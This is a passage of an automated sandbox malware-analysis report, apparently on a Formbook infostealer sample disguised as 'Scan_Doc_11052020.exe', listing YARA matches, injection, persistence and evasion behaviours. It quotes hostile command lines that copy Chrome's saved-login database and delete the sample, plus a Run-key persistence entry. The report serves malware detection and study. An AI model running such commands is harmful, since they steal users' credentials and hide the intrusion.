Source: C:\Windows\SysWOW64\systray.exe, Code function: String function: 04DBDDE8 appears 48 times
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe, Code function: String function: 05F1DDE8 appears 48 times
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe, Code function: String function: 05ECB0E0 appears 176 times
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe, Code function: String function: 05F55110 appears 38 times
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe, Code function: String function: 05C1DDE8 appears 49 times
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe, Code function: String function: 0579DDE8 appears 49 times
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe, Code function: String function: 0574B0E0 appears 176 times
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe, Code function: String function: 05C55110 appears 38 times
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe, Code function: String function: 05BCB0E0 appears 176 times
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe, Code function: String function: 057D5110 appears 40 times
Sample file name differs from the original file name recorded in the version info
Source: Scan_Doc_11052020.exe, 00000000.00000002.844244857.0000000000B1C000.00000002.00020000.sdmp, Binary or memory string: OriginalFilenameSuihzn.exeN vs Scan_Doc_11052020.exe
Source: Scan_Doc_11052020.exe, 00000000.00000002.856731482.0000000005450000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenamewEYbapqACmfn.exe4 vs Scan_Doc_11052020.exe
Source: Scan_Doc_11052020.exe, 00000000.00000002.873153767.0000000005FBF000.00000040.00000001.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs Scan_Doc_11052020.exe
Source: Scan_Doc_11052020.exe, 00000000.00000002.855597802.00000000053C0000.00000002.00000001.sdmp, Binary or memory string: OriginalFilenamemscorrc.dllT vs Scan_Doc_11052020.exe
Source: Scan_Doc_11052020.exe, Binary or memory string: OriginalFilenameSuihzn.exeN vs Scan_Doc_11052020.exe
Searches the installation path of Mozilla Firefox
Source: C:\Windows\SysWOW64\systray.exe, Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install Directory
Tries to load missing DLLs
Source: C:\Windows\explorer.exe, Section loaded: comsvcs.dll
Source: C:\Windows\explorer.exe, Section loaded: duser.dll
Yara signature match
Source: 0000000F.00000002.1123596075.00000000050C0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
Source: 0000000F.00000002.1123596075.00000000050C0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
Source: 00000004.00000002.1194591234.0000000000B20000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
Source: 00000004.00000002.1194591234.0000000000B20000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
Source: 0000000F.00000002.1122903967.0000000004EB0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
Source: 0000000F.00000002.1122903967.0000000004EB0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
Source: 00000000.00000002.857272679.0000000005510000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
Source: 00000000.00000002.857272679.0000000005510000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
Source: 0000000E.00000002.1123325288.0000000005310000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
Source: 0000000E.00000002.1123325288.0000000005310000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
Source: 0000000F.00000002.1120293845.00000000037A5000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
Source: 0000000F.00000002.1120293845.00000000037A5000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
Source: 00000000.00000002.859171433.0000000005650000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
Source: 00000000.00000002.859171433.0000000005650000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
Source: 0000000E.00000002.1123113610.00000000051E0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
Source: 0000000E.00000002.1123113610.00000000051E0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
Source: 0000000F.00000002.1122759975.0000000004D70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.1122759975.0000000004D70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.860529111.0000000005680000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.860529111.0000000005680000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.1120571214.0000000003C25000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.1120571214.0000000003C25000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.1194734032.0000000000B90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.1194734032.0000000000B90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.1194902186.0000000000BD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.1194902186.0000000000BD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.1115593061.0000000000F00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.1115593061.0000000000F00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.1123910075.0000000005600000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.1123910075.0000000005600000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.850402740.0000000003EE5000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.850402740.0000000003EE5000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.2.vrhdctut50jxtp.exe.4d70000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 15.2.vrhdctut50jxtp.exe.4d70000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 14.2.vrhdctut50jxtp.exe.51e0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 14.2.vrhdctut50jxtp.exe.51e0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.2.vrhdctut50jxtp.exe.4d70000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 15.2.vrhdctut50jxtp.exe.4d70000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Scan_Doc_11052020.exe.5510000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Scan_Doc_11052020.exe.5510000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Scan_Doc_11052020.exe.5510000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Scan_Doc_11052020.exe.5510000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 14.2.vrhdctut50jxtp.exe.51e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 14.2.vrhdctut50jxtp.exe.51e0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Classification label
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@15/10@4/3
Creates files inside the user directory
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Scan_Doc_11052020.exe.log
Creates mutexes
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3824:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2680:120:WilError_01
Creates temporary files
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\Zhrptqdzh
PE file has an executable .text section and no other executable section
Source: Scan_Doc_11052020.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Parts of this application are using the .NET runtime (probably coded in C#)
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dll (reported 2 times)
Reads ini files
Source: C:\Windows\explorer.exe | File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Reads the hosts file
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts (reported 2 times)
Source: C:\Windows\SysWOW64\systray.exe | File read: C:\Windows\System32\drivers\etc\hosts
Sample is known by Antivirus
Source: Scan_Doc_11052020.exe | Virustotal: Detection: 19%
Source: Scan_Doc_11052020.exe | ReversingLabs: Detection: 35%
Spawns processes
Source: unknown | Process created: C:\Users\user\Desktop\Scan_Doc_11052020.exe 'C:\Users\user\Desktop\Scan_Doc_11052020.exe'
Source: unknown | Process created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
Source: unknown | Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Scan_Doc_11052020.exe'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe
Source: unknown | Process created: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe 'C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe'
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: unknown | Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Windows\explorer.exe | Process created: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe
Source: C:\Windows\explorer.exe | Process created: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe 'C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe'
Source: C:\Windows\SysWOW64\systray.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Scan_Doc_11052020.exe'
Source: C:\Windows\SysWOW64\systray.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Uses an in-process (OLE) Automation server
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6db7cd52-e3b7-4ecc-bb1f-388aeef6bb50}\InProcServer32
Writes ini files
Source: C:\Windows\SysWOW64\systray.exe | File written: C:\Users\user\AppData\Roaming\72R9-CPB\72Rlogri.ini
Uses Microsoft Silverlight
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Checks if Microsoft Office is installed
Source: C:\Windows\SysWOW64\systray.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
PE file contains a COM descriptor data directory
Source: Scan_Doc_11052020.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: Scan_Doc_11052020.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.813305822.0000000007010000.00000002.00000001.sdmp
Source: Binary string: cmmon32.pdb source: vrhdctut50jxtp.exe, 0000000F.00000002.1116411384.0000000000AC5000.00000004.00000020.sdmp
Source: Binary string: cmmon32.pdbGCTL source: vrhdctut50jxtp.exe, 0000000F.00000002.1116411384.0000000000AC5000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP source: Scan_Doc_11052020.exe, 00000000.00000002.866787591.0000000005EA0000.00000040.00000001.sdmp, systray.exe, 00000004.00000002.1198574130.0000000004D40000.00000040.00000001.sdmp, vrhdctut50jxtp.exe, 0000000E.00000002.1124555745.0000000005CBF000.00000040.00000001.sdmp, vrhdctut50jxtp.exe, 0000000F.00000002.1123661907.0000000005720000.00000040.00000001.sdmp, cmmon32.exe, 00000011.00000002.1118553949.000000000502F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: vrhdctut50jxtp.exe, cmmon32.exe, 00000011.00000002.1118553949.000000000502F000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.813305822.0000000007010000.00000002.00000001.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05F1DE2D push ecx; ret 0_2_05F1DE40
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_05364E9C push 2C00005Eh; iretd 0_2_05364EA1
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_053639A3 push 850FD83Bh; ret 0_2_053639A9
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Code function: 0_2_0536D292 push 8BD68B50h; iretd 0_2_0536D2A4
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DBDE2D push ecx; ret 4_2_04DBDE40
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_00B2D9CD push ds; retf 4_2_00B2D9CE
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_00B39A82 push eax; ret 4_2_00B39A88
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_00B39A8B push eax; ret 4_2_00B39AF2
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_00B252F9 pushfd ; retf 4_2_00B252EA
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_00B252E9 pushfd ; retf 4_2_00B252EA
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_00B39AEC push eax; ret 4_2_00B39AF2
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_00B39A35 push eax; ret 4_2_00B39A88
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_00B2521A push esi; iretd 4_2_00B25226
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 14_2_05C1DE2D push ecx; ret 14_2_05C1DE40
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Code function: 15_2_0579DE2D push ecx; ret 15_2_0579DE40

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\Zhrptqdzh\vrhdctut50jxtp.exe

Boot Survival:

Creates an autostart registry key
Source: C:\Windows\SysWOW64\systray.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run WDTPZDJ0IJKL (reported 2 times)

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | Process information set: NOOPENFILEERRORBOX (reported 12 times)
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\systray.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (reported 5 times)
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (reported 3 times)
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | Process information set: NOOPENFILEERRORBOX (reported 24 times)

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | RDTSC instruction interceptor: First address: 0000000005517244 second address: 000000000551724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Scan_Doc_11052020.exe | RDTSC instruction interceptor: First address: 00000000055174AE second address: 00000000055174B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe | RDTSC instruction interceptor: First address: 0000000000B27244 second address: 0000000000B2724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe | RDTSC instruction interceptor: First address: 0000000000B274AE second address: 0000000000B274B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | RDTSC instruction interceptor: First address: 00000000051E7244 second address: 00000000051E724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | RDTSC instruction interceptor: First address: 0000000004D77244 second address: 0000000004D7724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | RDTSC instruction interceptor: First address: 0000000004D774AE second address: 0000000004D774B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Zhrptqdzh\vrhdctut50jxtp.exe | RDTSC instruction interceptor: First address: 00000000051E74AE second address: 00000000051E74B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe | RDTSC instruction interceptor: First address: 0000000000F07244 second address: 0000000000F0724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmd.exe | RDTSC instruction interceptor: First address: 0000000000947244 second address: 000000000094724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmd.exe | RDTSC instruction interceptor: First address: 00000000009474AE second address: 00000000009474B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
